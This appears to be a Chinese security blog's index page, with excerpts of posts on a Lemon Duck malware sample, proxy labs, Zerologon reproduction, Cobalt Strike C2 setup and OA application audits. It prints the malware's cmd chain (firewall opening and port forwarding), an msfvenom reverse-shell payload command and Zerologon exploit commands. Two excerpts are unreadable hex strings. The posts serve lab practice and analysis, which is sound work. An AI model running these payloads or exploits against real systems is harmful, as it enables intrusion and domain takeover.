柠檬鸭组织样本分析
起因
分析1.txt文本内容如下
cmd /c echo RmMrcM >> c:\windows\temp\msInstall.exe&echo copy /y c:\windows\temp\msInstall.exe c:\windows\kNnk.exe>c:/windows/temp/p.bat&echo "*" >c:\windows\temp\eb.txt&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.b ...
多级代理实验
内网渗透中经常碰到多个网段的机器不出网的情况,做一套试验环境来练习下多级代理
环境介绍以下环境均在VM16中搭建
LEDE x2.36 软路由 *1
网络:可出网,边界,IP 172.16.17.100
虚拟机配置:2C 4G 4网卡
Windows server 2019 *1
网络:可出网,DMZ,WEB机,IP 172.16.18.2
虚拟机配置:2C 2G 1网卡
Windows server 2016 *1
网络:不可出网,DMZ,IP 10.100.100.2
虚拟机配置:2C 2G 1网卡
Windows server 2008 R2*1
网络:不可出网,DMZ,IP 192.168.37.1
虚拟机配置:2C 2G 1网卡
Win10 *1
网络:通Win2019
虚机配置:4C8G 1网卡
拓扑图
攻击机配置
Win10
kali (parrot亦可)
过程LEDE配置安装好LEDE后配置接口如下
配置后状态如图
防火墙配置如下
DMZ规则
DMZ_WAN规则
端口转发规则LEDE防火墙新建端口转发规则
测试连通性3台 ...
NPS弱口令之殇
NPS作为一款轻量级、高性能、功能强大的内网穿透代理服务器。并且支持多种协议的转发从而被广泛使用,借助网络空间搜索引擎2020年11月26日的结果,全球范围内共5,582个主机为NPS代理服务器。
目录解析以NPS 0.26.9版本为例,目录结构及含义如下
│ nps│ ├───conf //配置目录│ clients.json //客户端数据文件 │ hosts.json //主机数据文件│ nps.conf //配置文件│ server.key //私钥│ server.pem //证书│ tasks.json //任务数据文件│ └───web //网站目录 ├───static //静态资源目录 │ ├───css │ │ bootstrap-table.min.css ...
cobaltstrike插件CrossC2踩坑记录
前言CrossC2面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/…)的安全评估,支持自定义模块,及包含一些常用的渗透模块。
使用直接下载https://github.com/gloxec/CrossC2/releases 中的最新版即可,导入CNA后即可使用
4.0需要下载4.0分支
4.1需要下载4.1分支
踩坑由于本机是win10,会出现以下2个问题:
1、丢失ucrtbased.dll问题在直接运行genCrossC2.Win.exe时会报错,丢失丢失ucrtbased.dll。
解决方案:安装VS2017或VS2019即可解决,文章后面会提供32位的dll下载,下载后移入C:\Windows\System32即可使用
2、windows下无法通过CNA中生成Linux beacon这个坑浪费了一下午去解决,直接丢解决过程
定位问题cna插件中的第3、4行需要替换为相应的路径
第115行的 $dialog = dialog("CrossC2 Payload Generator", %(u ...
内存取证工具Volatility使用
记录下Volatility使用过程
环境
Parrot *1
Windows 2008*1
先生成个msf马子
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.17.6 LPORT=4444 -a x64 -f exe -o /home/parrot/Desktop/1.exe
拷到Windows2008机器上运行后迁移进程
然后使用dumpit对内存做完整镜像
做好后的镜像大小取决于机器内存的大小,机器内存越大,镜像后的文件越大
拷回parrot,开始分析
分析命令如下
volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 malfind查找疑似被注入的进程,这里应该先执行volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw imageinfo来确定使用配置文件的
┌─[[email protected] ...
PHP ioncube V10.X解密
背景项目中碰到个用ionCube V10加密的源码,需要解密做审计,记录下踩的坑
文件数量2000多,找了一番网站发现https://easytoyou.eu/可以提供解密服务,
BTW,这个站一次只能上传一个文件,手动点2000多次不说累死也得烦死
过程按照惯例,先注册个号看看有什么功能
好嘛 10欧元30天会员,冲了再看看解密面板
面板变了,上传个加密的文件抓个包看看
解密完成后在页面中回显下载链接,那么就可以写脚本批量跑了。
思路脚本需要实现的功能是遍历所有指定格式的文件,保存获取到的列表,上传解密,下载解密后的文件
直接贴代码
遍历符合格式的文件代码# Load Foldersdef get_all_path(self): if os.path.exists(self.FileList): pass else: postfix = set(['php']) # 设置要记录的文件格式 for maindir, subdir, file_name_list in os.walk(self.dstF ...
林级域环境下复现CVE-2020-1472
环境
域林环境
根DC:10.100.100.100(server2019)
一级林DC:10.100.100.101(server2016)
二级林DC:10.100.100.102(server2012R2)
跳板机(攻击机):10.100.100.105(WIN10)
简要拓扑
过程
利用过程:将域控机器账户密码设置为空->读取域管hash->读取sam文件hash(ntds.dit)->恢复域控机器账户密码
攻击首先安装impacket:
git clone https://github.com/SecureAuthCorp/impacket.gitcd impacketpip install -r requirements.txtpython setup.py install
然后下载利用脚本
git clone https://github.com/dirkjanm/CVE-2020-1472cd CVE-2020-1472
直接拿根域测,执行
python cve-2020-1472-exploit.py AD 10.100.100.100
此时 ...
审计通达OA时的一些记录
学习审计通达OA时发现的一些有意思的事
全局变量覆盖审计时发现前辈们提到了这个问题,跟了下存在问题的文件
比如存在变量覆盖的文件是pda\vote\list.php,
require_once "pda/auth.php";include_once "inc/conn.php";include_once "inc/utility_all.php";include_once "mobile/api/qyapp.vote.class.php";if ($P == "") { $P = $_COOKIE["PHPSESSID"];}else { $P = $_GET["P"];}
这里包含了inc/conn.php数据库连接文件
继续跟,发现包含了inc/td_config.php
<?phpinclude_once "inc/common.inc.php";$ROOT_PATH = ...
通达OA 2013-2019(V11.X)前台多处注入点
f6ae6e37cafa8b635e173b811b985f64cc4dc9d53b5e11c39587f78adc381a31db73c6dbba5d5a7c259f9a980eafd97d4dfe18c81555417cbbf70c5f3657ea8c7e189c96475afc18ca05d6405e0e335a463aad7e770fc9e51bcfe996bee94b8259008eb5b9bba38e566a75f8e0caf04adeb9f31f1993cb2924183c17241aa5fc403703f125504a25a6521ff8fffd49dee1e09bc703bf84f0845c8be7938b9f4761acf8b55189aac692aa04e97aa7c460293067faac7fb4827a197206aec814c73f13fb9903d7e24593482e7385702b723acca845431fb48155ca62bebdfb687030b37ad6cc207a0d2c457e749f5022c2bd7c039121228cdf3 ...
CS通过CDN上线
学习下CS通过CDN上线
所需
域名*1
CDN*1
VPS*1
部署域名购买后将DNS更改为CDN服务商的DNS服务器,然后等待生效
以CF为例,生效后会给邮箱发一封邮件
然后配置解析域名
CS配置文件 C2.profile
### # @Author : Sp4ce # @Date : 2020-07-15 11:59:42 # @LastEditors : Sp4ce # @LastEditTime : 2020-07-15 15:14:57 # @Description : Challenge Everything.### set sample_name "Etumbot";set sleeptime "2000";set jitter "0";set maxdns "255";set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trid ...
域渗透实战
d85b19524ca0a6165d6a5d104b6e7f3540bbe833f7a46aa2c8385f2352a6b78191a33438805dbe118a73272245003888f1c78cbbde20bd8af3c881f883531bc2e0b8b49dbecae215cc2e7e2be5558c3e310bf0d5858dcc15c6846cffa5d2aff938abc51936656843467a62db1f13e24224ccac048a0fa5f022a7101e4d97263c194ef1542a93050fb2fc78f17028c9f82567be158299ba35e709145e46802f710405c350bc8963b0dbb5d7ac1370bc8745353ff288ca0a79e85a45ec4f56892f279b68c3e0ccca76cac539173a80258e647241cec2efd5165ac1646abe247a57c5294df2f32de6c149e59b6e0800104f2737904744bfa5960 ...
通达OA任意文件上传+任意文件包含分析
通达OA官方于2020-03-13发布了安全更新,修复了任意文件上传(2013、2013adv、2015、2016、2017、V11)和文件包含(V11)漏洞,从官网下到源码解密后,简单看了下
直接看主流的2017、V11产品吧,这个系列产品有全版本的变量覆盖问题
V11、2017任意上传以2017为例
补丁文件路径:2020_A1\2017版\ispirit\im\upload.php
左侧为原始代码,右侧为补丁,可以看到直接将鉴权的文件从else里释放了出来,避免了第5行传入P值导致的权限绕过问题
继续往下看任意文件上传的问题
$TYPE = $_POST["TYPE"];//获取TYPE$DEST_UID = $_POST["DEST_UID"];//获取DEST_UID(接收方ID)$dataBack = array();if (($DEST_UID != "") && !td_verify_ids($ids)) { $dataBack = array("status" ...